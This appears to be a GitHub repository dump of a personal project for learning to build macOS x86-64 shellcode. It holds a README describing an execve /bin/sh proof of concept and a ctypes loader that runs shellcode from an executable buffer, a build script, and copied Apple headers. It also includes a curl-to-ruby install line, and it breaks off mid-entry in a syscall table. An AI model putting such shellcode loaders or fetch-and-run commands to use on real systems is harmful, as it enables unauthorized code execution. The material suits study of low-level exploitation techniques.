├── .gitignore ├── LICENSE ├── README.md ├── build.sh ├── docs ├── osx-mman.h └── osx-syscall.h ├── loader ├── contained-py.py └── loader.py └── shellcode ├── system-execve-order-file.txt └── system-execve-shell.c /.gitignore: -------------------------------------------------------------------------------- 1 | # Object files 2 | *.o 3 | *.ko 4 | *.obj 5 | *.elf 6 | *.DS_Store 7 | *.sc 8 | # Precompiled Headers 9 | *.gch 10 | *.pch 11 | 12 | # Libraries 13 | *.lib 14 | *.a 15 | *.la 16 | *.lo 17 | 18 | # Shared objects (inc. Windows DLLs) 19 | *.dll 20 | *.so 21 | *.so.* 22 | *.dylib 23 | 24 | # Executables 25 | *.exe 26 | *.out 27 | *.app 28 | *.i*86 29 | *.x86_64 30 | *.hex 31 | 32 | # Debug files 33 | *.dSYM/ 34 | *.su 35 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Alexander Rymdeko-Harvey 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Using C to build OSX Shellcode 2 | 3 | A small setup that I used to learn X86_x64 shellcode generation using ASM and compiled C code. 4 | 5 | 6 | ## OSX Host Setup 7 | 8 | Please ensure you have the following installed before starting to build. 9 | 10 | - Install XCode: `xcode-select --install` 11 | - Install Brew: `/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"` 12 | - Install Brew GCC: `brew install gcc` 13 | - Link GCC 6: `ln -s /usr/local/Cellar/gcc/6.3.0_1/bin/gcc-6 gcc-6` 14 | 15 | 16 | ## Shellcode generation 17 | 18 | In this project we have a few diffrent types of shell code that I have built as POC using C and ASM. 19 | 20 | ### System Execve /bin/sh 21 | This code uses inline ASM in C for system call and executes a /bin/sh as an example. 22 | 23 | ## Shellcode loader 24 | 25 | in the /loader folder you will find 2 loader examples, the Python and C based loader. Basic shellcode loader and best part is its pure python using ctypes and std C lib. 26 | 27 | ### Python Example: 28 | `python loader.py ../shellcode/system-execve-shell.sc` 29 | 30 | ``` 31 | MacBook-Pro:loader test$ python loader.py ../shellcode/system-execve-shell.sc 32 | ------------------------------------------- 33 | * C runtime libary loaded: /usr/lib/libSystem.B.dylib 34 | * Current page size: 4096 35 | * Shellcode buffer pointer: <__main__.LP_c_int object at 0x10f56b950> 36 | * Shellcode file size: 122 37 | * Shellcode file pointer: <__main__.LP_c_int object at 0x10f56b950> 38 | ------------------------------------------- 39 | - Shellcode buffer now RX memory 40 | - Casting pointer to: <__main__.LP_c_int object at 0x10f56b950> 41 | - Executing shellcode 42 | bash-3.2$ exit 43 | exit 44 | ``` 45 | 46 | #### Credit 47 | Thanks for the great resource: https://github.com/tbarabosch/MacRE 48 | -------------------------------------------------------------------------------- /build.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | echo "- Starting to build Shellcode: system-execve-shell " 3 | gcc-6 -c shellcode/system-execve-shell.c -o shellcode/system-execve-shell.o --shared -fpic -static -O0 -fno-asynchronous-unwind-tables -D LIB 4 | echo "- Starting to link Shellcode: system-execve-shell " 5 | ld shellcode/system-execve-shell.o -o shellcode/system-execve-shell -S -static -dylib -order_file shellcode/system-execve-order-file.txt 6 | echo "- Starting to export Shellcode: system-execve-shell " 7 | gobjcopy -O binary --only-section=.text shellcode/system-execve-shell shellcode/system-execve-shell.sc 8 | 9 | echo "- Clean Up from build" 10 | rm -f shellcode/system-execve-shell.o 11 | rm -f shellcode/system-execve-shell 12 | -------------------------------------------------------------------------------- /docs/osx-mman.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2000-2002 Apple Computer, Inc. All rights reserved. 3 | * 4 | * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ 5 | * 6 | * This file contains Original Code and/or Modifications of Original Code 7 | * as defined in and that are subject to the Apple Public Source License 8 | * Version 2.0 (the 'License'). You may not use this file except in 9 | * compliance with the License. The rights granted to you under the License 10 | * may not be used to create, or enable the creation or redistribution of, 11 | * unlawful or unlicensed copies of an Apple operating system, or to 12 | * circumvent, violate, or enable the circumvention or violation of, any 13 | * terms of an Apple operating system software license agreement. 14 | * 15 | * Please obtain a copy of the License at 16 | * http://www.opensource.apple.com/apsl/ and read it before using this file. 17 | * 18 | * The Original Code and all software distributed under the License are 19 | * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER 20 | * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, 21 | * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, 22 | * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. 23 | * Please see the License for the specific language governing rights and 24 | * limitations under the License. 25 | * 26 | * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ 27 | */ 28 | /* Copyright (c) 1995 NeXT Computer, Inc. All Rights Reserved */ 29 | /*- 30 | * Copyright (c) 1982, 1986, 1993 31 | * The Regents of the University of California. All rights reserved. 32 | * 33 | * Redistribution and use in source and binary forms, with or without 34 | * modification, are permitted provided that the following conditions 35 | * are met: 36 | * 1. Redistributions of source code must retain the above copyright 37 | * notice, this list of conditions and the following disclaimer. 38 | * 2. Redistributions in binary form must reproduce the above copyright 39 | * notice, this list of conditions and the following disclaimer in the 40 | * documentation and/or other materials provided with the distribution. 41 | * 3. All advertising materials mentioning features or use of this software 42 | * must display the following acknowledgement: 43 | * This product includes software developed by the University of 44 | * California, Berkeley and its contributors. 45 | * 4. Neither the name of the University nor the names of its contributors 46 | * may be used to endorse or promote products derived from this software 47 | * without specific prior written permission. 48 | * 49 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 50 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 51 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 52 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 53 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 54 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 55 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 56 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 57 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 58 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 59 | * SUCH DAMAGE. 60 | * 61 | * @(#)mman.h 8.1 (Berkeley) 6/2/93 62 | */ 63 | 64 | /* 65 | * Currently unsupported: 66 | * 67 | * [TYM] POSIX_TYPED_MEM_ALLOCATE 68 | * [TYM] POSIX_TYPED_MEM_ALLOCATE_CONTIG 69 | * [TYM] POSIX_TYPED_MEM_MAP_ALLOCATABLE 70 | * [TYM] struct posix_typed_mem_info 71 | * [TYM] posix_mem_offset() 72 | * [TYM] posix_typed_mem_get_info() 73 | * [TYM] posix_typed_mem_open() 74 | */ 75 | 76 | #ifndef _SYS_MMAN_H_ 77 | #define _SYS_MMAN_H_ 78 | 79 | #include 80 | #include 81 | 82 | #include 83 | 84 | /* 85 | * [various] The mode_t, off_t, and size_t types shall be defined as 86 | * described in 87 | */ 88 | #include 89 | #include 90 | #include 91 | 92 | /* 93 | * Protections are chosen from these bits, or-ed together 94 | */ 95 | #define PROT_NONE 0x00 /* [MC2] no permissions */ 96 | #define PROT_READ 0x01 /* [MC2] pages can be read */ 97 | #define PROT_WRITE 0x02 /* [MC2] pages can be written */ 98 | #define PROT_EXEC 0x04 /* [MC2] pages can be executed */ 99 | 100 | /* 101 | * Flags contain sharing type and options. 102 | * Sharing types; choose one. 103 | */ 104 | #define MAP_SHARED 0x0001 /* [MF|SHM] share changes */ 105 | #define MAP_PRIVATE 0x0002 /* [MF|SHM] changes are private */ 106 | #if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE) 107 | #define MAP_COPY MAP_PRIVATE /* Obsolete */ 108 | #endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */ 109 | 110 | /* 111 | * Other flags 112 | */ 113 | #define MAP_FIXED 0x0010 /* [MF|SHM] interpret addr exactly */ 114 | #if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE) 115 | #define MAP_RENAME 0x0020 /* Sun: rename private pages to file */ 116 | #define MAP_NORESERVE 0x0040 /* Sun: don't reserve needed swap area */ 117 | #define MAP_RESERVED0080 0x0080 /* previously unimplemented MAP_INHERIT */ 118 | #define MAP_NOEXTEND 0x0100 /* for MAP_FILE, don't change file size */ 119 | #define MAP_HASSEMAPHORE 0x0200 /* region may contain semaphores */ 120 | #define MAP_NOCACHE 0x0400 /* don't cache pages for this mapping */ 121 | #define MAP_JIT 0x0800 /* Allocate a region that will be used for JIT purposes */ 122 | 123 | /* 124 | * Mapping type 125 | */ 126 | #define MAP_FILE 0x0000 /* map from file (default) */ 127 | #define MAP_ANON 0x1000 /* allocated from memory, swap space */ 128 | #define MAP_ANONYMOUS MAP_ANON 129 | 130 | /* 131 | * The MAP_RESILIENT_* flags can be used when the caller wants to map some 132 | * possibly unreliable memory and be able to access it safely, possibly 133 | * getting the wrong contents rather than raising any exception. 134 | * For safety reasons, such mappings have to be read-only (PROT_READ access 135 | * only). 136 | * 137 | * MAP_RESILIENT_CODESIGN: 138 | * accessing this mapping will not generate code-signing violations, 139 | * even if the contents are tainted. 140 | * MAP_RESILIENT_MEDIA: 141 | * accessing this mapping will not generate an exception if the contents 142 | * are not available (unreachable removable or remote media, access beyond 143 | * end-of-file, ...). Missing contents will be replaced with zeroes. 144 | */ 145 | #define MAP_RESILIENT_CODESIGN 0x2000 /* no code-signing failures */ 146 | #define MAP_RESILIENT_MEDIA 0x4000 /* no backing-store failures */ 147 | 148 | #endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */ 149 | 150 | /* 151 | * Process memory locking 152 | */ 153 | #define MCL_CURRENT 0x0001 /* [ML] Lock only current memory */ 154 | #define MCL_FUTURE 0x0002 /* [ML] Lock all future memory as well */ 155 | 156 | /* 157 | * Error return from mmap() 158 | */ 159 | #define MAP_FAILED ((void *)-1) /* [MF|SHM] mmap failed */ 160 | 161 | /* 162 | * msync() flags 163 | */ 164 | #define MS_ASYNC 0x0001 /* [MF|SIO] return immediately */ 165 | #define MS_INVALIDATE 0x0002 /* [MF|SIO] invalidate all cached data */ 166 | #define MS_SYNC 0x0010 /* [MF|SIO] msync synchronously */ 167 | 168 | #if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE) 169 | #define MS_KILLPAGES 0x0004 /* invalidate pages, leave mapped */ 170 | #define MS_DEACTIVATE 0x0008 /* deactivate pages, leave mapped */ 171 | 172 | #endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */ 173 | 174 | 175 | /* 176 | * Advice to madvise 177 | */ 178 | #define POSIX_MADV_NORMAL 0 /* [MC1] no further special treatment */ 179 | #define POSIX_MADV_RANDOM 1 /* [MC1] expect random page refs */ 180 | #define POSIX_MADV_SEQUENTIAL 2 /* [MC1] expect sequential page refs */ 181 | #define POSIX_MADV_WILLNEED 3 /* [MC1] will need these pages */ 182 | #define POSIX_MADV_DONTNEED 4 /* [MC1] dont need these pages */ 183 | 184 | #if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE) 185 | #define MADV_NORMAL POSIX_MADV_NORMAL 186 | #define MADV_RANDOM POSIX_MADV_RANDOM 187 | #define MADV_SEQUENTIAL POSIX_MADV_SEQUENTIAL 188 | #define MADV_WILLNEED POSIX_MADV_WILLNEED 189 | #define MADV_DONTNEED POSIX_MADV_DONTNEED 190 | #define MADV_FREE 5 /* pages unneeded, discard contents */ 191 | #define MADV_ZERO_WIRED_PAGES 6 /* zero the wired pages that have not been unwired before the entry is deleted */ 192 | #define MADV_FREE_REUSABLE 7 /* pages can be reused (by anyone) */ 193 | #define MADV_FREE_REUSE 8 /* caller wants to reuse those pages */ 194 | #define MADV_CAN_REUSE 9 195 | #define MADV_PAGEOUT 10 /* page out now (internal only) */ 196 | 197 | /* 198 | * Return bits from mincore 199 | */ 200 | #define MINCORE_INCORE 0x1 /* Page is incore */ 201 | #define MINCORE_REFERENCED 0x2 /* Page has been referenced by us */ 202 | #define MINCORE_MODIFIED 0x4 /* Page has been modified by us */ 203 | #define MINCORE_REFERENCED_OTHER 0x8 /* Page has been referenced */ 204 | #define MINCORE_MODIFIED_OTHER 0x10 /* Page has been modified */ 205 | #endif /* (!_POSIX_C_SOURCE || _DARWIN_C_SOURCE) */ 206 | 207 | 208 | 209 | __BEGIN_DECLS 210 | /* [ML] */ 211 | int mlockall(int); 212 | int munlockall(void); 213 | /* [MR] */ 214 | int mlock(const void *, size_t); 215 | #ifndef _MMAP 216 | #define _MMAP 217 | /* [MC3]*/ 218 | void * mmap(void *, size_t, int, int, int, off_t) __DARWIN_ALIAS(mmap); 219 | #endif 220 | /* [MPR] */ 221 | int mprotect(void *, size_t, int) __DARWIN_ALIAS(mprotect); 222 | /* [MF|SIO] */ 223 | int msync(void *, size_t, int) __DARWIN_ALIAS_C(msync); 224 | /* [MR] */ 225 | int munlock(const void *, size_t); 226 | /* [MC3]*/ 227 | int munmap(void *, size_t) __DARWIN_ALIAS(munmap); 228 | /* [SHM] */ 229 | int shm_open(const char *, int, ...); 230 | int shm_unlink(const char *); 231 | /* [ADV] */ 232 | int posix_madvise(void *, size_t, int); 233 | 234 | #if !defined(_POSIX_C_SOURCE) || defined(_DARWIN_C_SOURCE) 235 | int madvise(void *, size_t, int); 236 | int mincore(const void *, size_t, char *); 237 | int minherit(void *, size_t, int); 238 | #endif 239 | 240 | 241 | __END_DECLS 242 | 243 | #endif /* !_SYS_MMAN_H_ */ -------------------------------------------------------------------------------- /docs/osx-syscall.h: -------------------------------------------------------------------------------- 1 | ; derived from: FreeBSD @(#)syscalls.master 8.2 (Berkeley) 1/13/94 2 | ; 3 | ; System call name/number master file. 4 | ; This is file processed by .../xnu/bsd/kern/makesyscalls.sh and creates: 5 | ; .../xnu/bsd/kern/init_sysent.c 6 | ; .../xnu/bsd/kern/syscalls.c 7 | ; .../xnu/bsd/sys/syscall.h 8 | ; .../xnu/bsd/sys/sysproto.h 9 | ; .../xnu/bsd/security/audit_syscalls.c 10 | 11 | ; Columns -> | Number Audit Files | { Name and Args } | { Comments } 12 | ; Number: system call number, must be in order 13 | ; Audit: the audit event associated with the system call 14 | ; A value of AUE_NULL means no auditing, but it also means that 15 | ; there is no audit event for the call at this time. For the 16 | ; case where the event exists, but we don't want auditing, the 17 | ; event should be #defined to AUE_NULL in audit_kevents.h. 18 | ; Files: with files to generate - "ALL" or any combo of: 19 | ; "T" for syscall table (in init_sysent.c) 20 | ; "N" for syscall names (in syscalls.c) 21 | ; "H" for syscall headers (in syscall.h) 22 | ; "P" for syscall prototypes (in sysproto.h) 23 | ; Name and Args: function prototype, optionally followed by 24 | ; NO_SYSCALL_STUB (which mean no system call stub will 25 | ; be generated in libSystem) and ending with a semicolon. 26 | ; (Note: functions prefixed by double-underbar are 27 | ; automatically given the NO_SYSCALL_STUB attribute.) 28 | ; Comments: additional comments about the sys call copied to output files 29 | 30 | ; #ifdef's, #include's, #if's etc. are copied to all output files. 31 | ; N.B.: makesyscalls.sh and createsyscalls.pl must be updated to account 32 | ; for any new argument types. 33 | 34 | #include 35 | #include 36 | #include 37 | #include 38 | #include 39 | #include 40 | 41 | 0 AUE_NULL ALL { int nosys(void); } { indirect syscall } 42 | 1 AUE_EXIT ALL { void exit(int rval); } 43 | 2 AUE_FORK ALL { int fork(void); } 44 | 3 AUE_NULL ALL { user_ssize_t read(int fd, user_addr_t cbuf, user_size_t nbyte); } 45 | 4 AUE_NULL ALL { user_ssize_t write(int fd, user_addr_t cbuf, user_size_t nbyte); } 46 | 5 AUE_OPEN_RWTC ALL { int open(user_addr_t path, int flags, int mode); } 47 | 6 AUE_CLOSE ALL { int close(int fd); } 48 | 7 AUE_WAIT4 ALL { int wait4(int pid, user_addr_t status, int options, user_addr_t rusage); } 49 | 8 AUE_NULL ALL { int nosys(void); } { old creat } 50 | 9 AUE_LINK ALL { int link(user_addr_t path, user_addr_t link); } 51 | 10 AUE_UNLINK ALL { int unlink(user_addr_t path); } 52 | 11 AUE_NULL ALL { int nosys(void); } { old execv } 53 | 12 AUE_CHDIR ALL { int chdir(user_addr_t path); } 54 | 13 AUE_FCHDIR ALL { int fchdir(int fd); } 55 | 14 AUE_MKNOD ALL { int mknod(user_addr_t path, int mode, int dev); } 56 | 15 AUE_CHMOD ALL { int chmod(user_addr_t path, int mode); } 57 | 16 AUE_CHOWN ALL { int chown(user_addr_t path, int uid, int gid); } 58 | 17 AUE_NULL ALL { int nosys(void); } { old break } 59 | 18 AUE_GETFSSTAT ALL { int getfsstat(user_addr_t buf, int bufsize, int flags); } 60 | 19 AUE_NULL ALL { int nosys(void); } { old lseek } 61 | 20 AUE_GETPID ALL { int getpid(void); } 62 | 21 AUE_NULL ALL { int nosys(void); } { old mount } 63 | 22 AUE_NULL ALL { int nosys(void); } { old umount } 64 | 23 AUE_SETUID ALL { int setuid(uid_t uid); } 65 | 24 AUE_GETUID ALL { int getuid(void); } 66 | 25 AUE_GETEUID ALL { int geteuid(void); } 67 | 26 AUE_PTRACE ALL { int ptrace(int req, pid_t pid, caddr_t addr, int data); } 68 | #if SOCKETS 69 | 27 AUE_RECVMSG ALL { int recvmsg(int s, struct msghdr *msg, int flags); } 70 | 28 AUE_SENDMSG ALL { int sendmsg(int s, caddr_t msg, int flags); } 71 | 29 AUE_RECVFROM ALL { int recvfrom(int s, void *buf, size_t len, int flags, struct sockaddr *from, int *fromlenaddr); } 72 | 30 AUE_ACCEPT ALL { int accept(int s, caddr_t name, socklen_t *anamelen); } 73 | 31 AUE_GETPEERNAME ALL { int getpeername(int fdes, caddr_t asa, socklen_t *alen); } 74 | 32 AUE_GETSOCKNAME ALL { int getsockname(int fdes, caddr_t asa, socklen_t *alen); } 75 | #else 76 | 27 AUE_NULL ALL { int nosys(void); } 77 | 28 AUE_NULL ALL { int nosys(void); } 78 | 29 AUE_NULL ALL { int nosys(void); } 79 | 30 AUE_NULL ALL { int nosys(void); } 80 | 31 AUE_NULL ALL { int nosys(void); } 81 | 32 AUE_NULL ALL { int nosys(void); } 82 | #endif /* SOCKETS */ 83 | 33 AUE_ACCESS ALL { int access(user_addr_t path, int flags); } 84 | 34 AUE_CHFLAGS ALL { int chflags(char *path, int flags); } 85 | 35 AUE_FCHFLAGS ALL { int fchflags(int fd, int flags); } 86 | 36 AUE_SYNC ALL { int sync(void); } 87 | 37 AUE_KILL ALL { int kill(int pid, int signum, int posix); } 88 | 38 AUE_NULL ALL { int nosys(void); } { old stat } 89 | 39 AUE_GETPPID ALL { int getppid(void); } 90 | 40 AUE_NULL ALL { int nosys(void); } { old lstat } 91 | 41 AUE_DUP ALL { int dup(u_int fd); } 92 | 42 AUE_PIPE ALL { int pipe(void); } 93 | 43 AUE_GETEGID ALL { int getegid(void); } 94 | 44 AUE_PROFILE ALL { int profil(short *bufbase, size_t bufsize, u_long pcoffset, u_int pcscale); } 95 | 45 AUE_NULL ALL { int nosys(void); } { old ktrace } 96 | 46 AUE_SIGACTION ALL { int sigaction(int signum, struct __sigaction *nsa, struct sigaction *osa); } 97 | 47 AUE_GETGID ALL { int getgid(void); } 98 | 48 AUE_SIGPROCMASK ALL { int sigprocmask(int how, user_addr_t mask, user_addr_t omask); } 99 | 49 AUE_GETLOGIN ALL { int getlogin(char *namebuf, u_int namelen); } 100 | 50 AUE_SETLOGIN ALL { int setlogin(char *namebuf); } 101 | 51 AUE_ACCT ALL { int acct(char *path); } 102 | 52 AUE_SIGPENDING ALL { int sigpending(struct sigvec *osv); } 103 | 53 AUE_SIGALTSTACK ALL { int sigaltstack(struct sigaltstack *nss, struct sigaltstack *oss); } 104 | 54 AUE_IOCTL ALL { int ioctl(int fd, u_long com, caddr_t data); } 105 | 55 AUE_REBOOT ALL { int reboot(int opt, char *command); } 106 | 56 AUE_REVOKE ALL { int revoke(char *path); } 107 | 57 AUE_SYMLINK ALL { int symlink(char *path, char *link); } 108 | 58 AUE_READLINK ALL { int readlink(char *path, char *buf, int count); } 109 | 59 AUE_EXECVE ALL { int execve(char *fname, char **argp, char **envp); } 110 | 60 AUE_UMASK ALL { int umask(int newmask); } 111 | 61 AUE_CHROOT ALL { int chroot(user_addr_t path); } 112 | 62 AUE_NULL ALL { int nosys(void); } { old fstat } 113 | 63 AUE_NULL ALL { int nosys(void); } { used internally, reserved } 114 | 64 AUE_NULL ALL { int nosys(void); } { old getpagesize } 115 | 65 AUE_MSYNC ALL { int msync(caddr_t addr, size_t len, int flags); } 116 | 66 AUE_VFORK ALL { int vfork(void); } 117 | 67 AUE_NULL ALL { int nosys(void); } { old vread } 118 | 68 AUE_NULL ALL { int nosys(void); } { old vwrite } 119 | 69 AUE_NULL ALL { int nosys(void); } { old sbrk } 120 | 70 AUE_NULL ALL { int nosys(void); } { old sstk } 121 | 71 AUE_NULL ALL { int nosys(void); } { old mmap } 122 | 72 AUE_NULL ALL { int nosys(void); } { old vadvise } 123 | 73 AUE_MUNMAP ALL { int munmap(caddr_t addr, size_t len); } 124 | 74 AUE_MPROTECT ALL { int mprotect(caddr_t addr, size_t len, int prot); } 125 | 75 AUE_MADVISE ALL { int madvise(caddr_t addr, size_t len, int behav); } 126 | 76 AUE_NULL ALL { int nosys(void); } { old vhangup } 127 | 77 AUE_NULL ALL { int nosys(void); } { old vlimit } 128 | 78 AUE_MINCORE ALL { int mincore(user_addr_t addr, user_size_t len, user_addr_t vec); } 129 | 79 AUE_GETGROUPS ALL { int getgroups(u_int gidsetsize, gid_t *gidset); } 130 | 80 AUE_SETGROUPS ALL { int setgroups(u_int gidsetsize, gid_t *gidset); } 131 | 81 AUE_GETPGRP ALL { int getpgrp(void); } 132 | 82 AUE_SETPGRP ALL { int setpgid(int pid, int pgid); } 133 | 83 AUE_SETITIMER ALL { int setitimer(u_int which, struct itimerval *itv, struct itimerval *oitv); } 134 | 84 AUE_NULL ALL { int nosys(void); } { old wait } 135 | 85 AUE_SWAPON ALL { int swapon(void); } 136 | 86 AUE_GETITIMER ALL { int getitimer(u_int which, struct itimerval *itv); } 137 | 87 AUE_NULL ALL { int nosys(void); } { old gethostname } 138 | 88 AUE_NULL ALL { int nosys(void); } { old sethostname } 139 | 89 AUE_GETDTABLESIZE ALL { int getdtablesize(void); } 140 | 90 AUE_DUP2 ALL { int dup2(u_int from, u_int to); } 141 | 91 AUE_NULL ALL { int nosys(void); } { old getdopt } 142 | 92 AUE_FCNTL ALL { int fcntl(int fd, int cmd, long arg); } 143 | 93 AUE_SELECT ALL { int select(int nd, u_int32_t *in, u_int32_t *ou, u_int32_t *ex, struct timeval *tv); } 144 | 94 AUE_NULL ALL { int nosys(void); } { old setdopt } 145 | 95 AUE_FSYNC ALL { int fsync(int fd); } 146 | 96 AUE_SETPRIORITY ALL { int setpriority(int which, id_t who, int prio); } 147 | #if SOCKETS 148 | 97 AUE_SOCKET ALL { int socket(int domain, int type, int protocol); } 149 | 98 AUE_CONNECT ALL { int connect(int s, caddr_t name, socklen_t namelen); } 150 | #else 151 | 97 AUE_NULL ALL { int nosys(void); } 152 | 98 AUE_NULL ALL { int nosys(void); } 153 | #endif /* SOCKETS */ 154 | 99 AUE_NULL ALL { int nosys(void); } { old accept } 155 | 100 AUE_GETPRIORITY ALL { int getpriority(int which, id_t who); } 156 | 101 AUE_NULL ALL { int nosys(void); } { old send } 157 | 102 AUE_NULL ALL { int nosys(void); } { old recv } 158 | 103 AUE_NULL ALL { int nosys(void); } { old sigreturn } 159 | #if SOCKETS 160 | 104 AUE_BIND ALL { int bind(int s, caddr_t name, socklen_t namelen); } 161 | 105 AUE_SETSOCKOPT ALL { int setsockopt(int s, int level, int name, caddr_t val, socklen_t valsize); } 162 | 106 AUE_LISTEN ALL { int listen(int s, int backlog); } 163 | #else 164 | 104 AUE_NULL ALL { int nosys(void); } 165 | 105 AUE_NULL ALL { int nosys(void); } 166 | 106 AUE_NULL ALL { int nosys(void); } 167 | #endif /* SOCKETS */ 168 | 107 AUE_NULL ALL { int nosys(void); } { old vtimes } 169 | 108 AUE_NULL ALL { int nosys(void); } { old sigvec } 170 | 109 AUE_NULL ALL { int nosys(void); } { old sigblock } 171 | 110 AUE_NULL ALL { int nosys(void); } { old sigsetmask } 172 | 111 AUE_NULL ALL { int sigsuspend(sigset_t mask); } 173 | 112 AUE_NULL ALL { int nosys(void); } { old sigstack } 174 | #if SOCKETS 175 | 113 AUE_NULL ALL { int nosys(void); } { old recvmsg } 176 | 114 AUE_NULL ALL { int nosys(void); } { old sendmsg } 177 | #else 178 | 113 AUE_NULL ALL { int nosys(void); } 179 | 114 AUE_NULL ALL { int nosys(void); } 180 | #endif /* SOCKETS */ 181 | 115 AUE_NULL ALL { int nosys(void); } { old vtrace } 182 | 116 AUE_GETTIMEOFDAY ALL { int gettimeofday(struct timeval *tp, struct timezone *tzp); } 183 | 117 AUE_GETRUSAGE ALL { int getrusage(int who, struct rusage *rusage); } 184 | #if SOCKETS 185 | 118 AUE_GETSOCKOPT ALL { int getsockopt(int s, int level, int name, caddr_t val, socklen_t *avalsize); } 186 | #else 187 | 118 AUE_NULL ALL { int nosys(void); } 188 | #endif /* SOCKETS */ 189 | 119 AUE_NULL ALL { int nosys(void); } { old resuba } 190 | 120 AUE_READV ALL { user_ssize_t readv(int fd, struct iovec *iovp, u_int iovcnt); } 191 | 121 AUE_WRITEV ALL { user_ssize_t writev(int fd, struct iovec *iovp, u_int iovcnt); } 192 | 122 AUE_SETTIMEOFDAY ALL { int settimeofday(struct timeval *tv, struct timezone *tzp); } 193 | 123 AUE_FCHOWN ALL { int fchown(int fd, int uid, int gid); } 194 | 124 AUE_FCHMOD ALL { int fchmod(int fd, int mode); } 195 | 125 AUE_NULL ALL { int nosys(void); } { old recvfrom } 196 | 126 AUE_SETREUID ALL { int setreuid(uid_t ruid, uid_t euid); } 197 | 127 AUE_SETREGID ALL { int setregid(gid_t rgid, gid_t egid); } 198 | 128 AUE_RENAME ALL { int rename(char *from, char *to); } 199 | 129 AUE_NULL ALL { int nosys(void); } { old truncate } 200 | 130 AUE_NULL ALL { int nosys(void); } { old ftruncate } 201 | 131 AUE_FLOCK ALL { int flock(int fd, int how); } 202 | 132 AUE_MKFIFO ALL { int mkfifo(user_addr_t path, int mode); } 203 | #if SOCKETS 204 | 133 AUE_SENDTO ALL { int sendto(int s, caddr_t buf, size_t len, int flags, caddr_t to, socklen_t tolen); } 205 | 134 AUE_SHUTDOWN ALL { int shutdown(int s, int how); } 206 | 135 AUE_SOCKETPAIR ALL { int socketpair(int domain, int type, int protocol, int *rsv); } 207 | #else 208 | 133 AUE_NULL ALL { int nosys(void); } 209 | 134 AUE_NULL ALL { int nosys(void); } 210 | 135 AUE_NULL ALL { int nosys(void); } 211 | #endif /* SOCKETS */ 212 | 136 AUE_MKDIR ALL { int mkdir(user_addr_t path, int mode); } 213 | 137 AUE_RMDIR ALL { int rmdir(char *path); } 214 | 138 AUE_UTIMES ALL { int utimes(char *path, struct timeval *tptr); } 215 | 139 AUE_FUTIMES ALL { int futimes(int fd, struct timeval *tptr); } 216 | 140 AUE_ADJTIME ALL { int adjtime(struct timeval *delta, struct timeval *olddelta); } 217 | 141 AUE_NULL ALL { int nosys(void); } { old getpeername } 218 | 142 AUE_SYSCTL ALL { int gethostuuid(unsigned char *uuid_buf, const struct timespec *timeoutp); } 219 | 143 AUE_NULL ALL { int nosys(void); } { old sethostid } 220 | 144 AUE_NULL ALL { int nosys(void); } { old getrlimit } 221 | 145 AUE_NULL ALL { int 